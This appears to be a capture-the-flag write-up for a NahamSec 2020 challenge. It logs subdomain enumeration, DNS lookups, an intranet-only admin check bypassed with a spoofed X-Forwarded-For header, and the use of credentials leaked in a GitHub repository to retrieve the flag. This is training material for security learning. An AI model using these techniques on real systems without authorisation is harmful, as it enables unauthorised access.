Image: https://nahamsec.net/Nahamsec_CTF_Giveaway.jpg
No usefull metadata:
date:create: 2020-01-12T11:09:18+00:00
date:modify: 2020-01-07T00:53:58+00:00
Domain nahamsec.net
Wayback url:
http://nahamsec.net
http://nahamsec.net/robots.txt
12/11/2017 and 20/11/2017
User-agent: *
Disallow: /click
Not available anymore:
HTTP/1.1 404 Not Found
CF-Cache-Status: DYNAMIC
CF-RAY: 553eb562df27cddf-CDG
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 12 Jan 2020 11:14:44 GMT
Server: cloudflare
Set-Cookie: __cfduid=d598acd883d84a67d7afb12e3e596a97c1578827684; expires=Tue, 11-Feb-20 11:14:44 GMT; path=/; domain=.nahamsec.net; HttpOnly; SameSite=Lax
Transfer-Encoding: chunked
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at nahamsec.net Port 80</address>
</body></html>
Looks like wayback machine is a dead end in this case.
Nothing in the Google Cache and no results indexed by Google.
Simple HTTP GET on the root:
HTTP/1.1 200 OK
CF-Cache-Status: DYNAMIC
CF-RAY: 553ebd593a48eddf-CDG
Connection: keep-alive
Content-Encoding: gzip
Content-Type: text/html
Date: Sun, 12 Jan 2020 11:20:10 GMT
Last-Modified: Tue, 07 Jan 2020 19:53:09 GMT
Server: cloudflare
Set-Cookie: __cfduid=d38c1e3268c86c483ae0b67d66ae6d9f91578828010; expires=Tue, 11-Feb-20 11:20:10 GMT; path=/; domain=.nahamsec.net; HttpOnly; SameSite=Lax
Transfer-Encoding: chunked
Vary: Accept-Encoding
<html><title>Welcome To Nahamsec Giveaway CTF</title>
<style>
html,body{
margin:0;
height:100%;
}
img{
display:block;
width:100%; height:100%;
object-fit: cover;
}
</style>
<body>
<img src="Nahamsec_CTF_Giveaway.jpg"></img>
</body>
</html>
The website is using CloudFlare, maybe we can find the real IP.
Censys request for Nahamsec:
- https://censys.io/ipv4/134.209.1.150/table#443 (recond.dev, probably not part of this CTF).
Running Subfinder:
20.nahamsec.net
nahamsec.net
www.nahamsec.net
30kftw.nahamsec.net
api-admin.nahamsec.net
api-dev.nahamsec.net
http get http://30kftw.nahamsec.net/
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Length: 66
Content-Type: text/html
Date: Mon, 13 Jan 2020 09:05:37 GMT
ETag: "42-59ba507421ab2"
Keep-Alive: timeout=5, max=100
Last-Modified: Wed, 08 Jan 2020 18:26:17 GMT
Server: Apache/2.4.29 (Ubuntu)
Welcome to Admin Site, Admin area only allowed from our intranet!
Dig
digany 30kftw.nahamsec.net
30kftw.nahamsec.net. A 167.99.107.11
digany api-admin.nahamsec.net
api-admin.nahamsec.net. A 167.99.107.11
digany api-dev.nahamsec.net
api-dev.nahamsec.net. A 104.27.166.50
api-dev.nahamsec.net. A 104.27.167.50
api-dev.nahamsec.net. MX 12 167.99.107.11.
After a few tries:
http get http://30kftw.nahamsec.net/admin/ X-Forwarded-For:127.0.0.1
HTTP/1.1 200 OK
Accept-Ranges: bytes
Connection: Keep-Alive
Content-Encoding: gzip
Content-Length: 86
Content-Type: text/html
Date: Mon, 13 Jan 2020 09:40:11 GMT
ETag: "49-59ba51a64f2a5-gzip"
Keep-Alive: timeout=5, max=100
Last-Modified: Wed, 08 Jan 2020 18:31:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Oh!, looks like we have moved our api services to api-admin.nahamsec.net
After some bruteforcing:
http get http://api-admin.nahamsec.net/swagger.json ✔ 7309 11:13:51
HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 823
Content-Type: application/json
Date: Mon, 13 Jan 2020 10:13:55 GMT
Keep-Alive: timeout=5, max=100
Server: gunicorn/19.10.0
{
"basePath": "/",
"consumes": [
"application/json"
],
"info": {
"description": "Oh boy, everyone is talking about WW3 and you still hacking? even our developer was in rush that he left the credentials somewhere!",
"title": "Get_Flag API",
"version": "0.1"
},
"paths": {
"/api/getflag": {
"post": {
"operationId": "post_hello_world",
"responses": {
"200": {
"description": "Success"
}
},
"tags": [
"nahamsecCTF2020"
]
}
},
"/api/tokens": {
"get": {
"operationId": "get_hello_world",
"responses": {
"200": {
"description": "Success"
}
},
"tags": [
"nahamsecCTF2020"
]
}
}
},
"produces": [
"application/json"
],
"responses": {
"MaskError": {
"description": "When any error occurs on mask"
},
"ParseError": {
"description": "When a mask can't be parsed"
}
},
"swagger": "2.0",
"tags": [
{
"description": "Updates to be pulled soon!",
"name": "nahamsecCTF2020"
}
]
}
Searching nahamsec.net in Github led to this: https://github.com/garagosy/nahamsecCTF2020/blob/master/api.py
app = Flask(__name__)
api = Api(app, version='0.1', title='Get_Flag API',default='nahamsecCTF2020',default_label='updates to ve pulled soon!',
description='Oh boy, everyone is talking about WW3 and you still hacking? even our developer was in rush that he left the credentials somewhere!')
# this is damn old repo. Crdentials used are
'''
username: BugHunters
password: 4dawin
'''
http get http://api-admin.nahamsec.net/api/getflag -a BugHunters:4dawin HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 74
Content-Type: application/json
Date: Mon, 13 Jan 2020 10:48:29 GMT
Keep-Alive: timeout=5, max=100
Server: gunicorn/19.10.0
{
"Flag_is": "You are such a guru!, send this to [email protected]"
}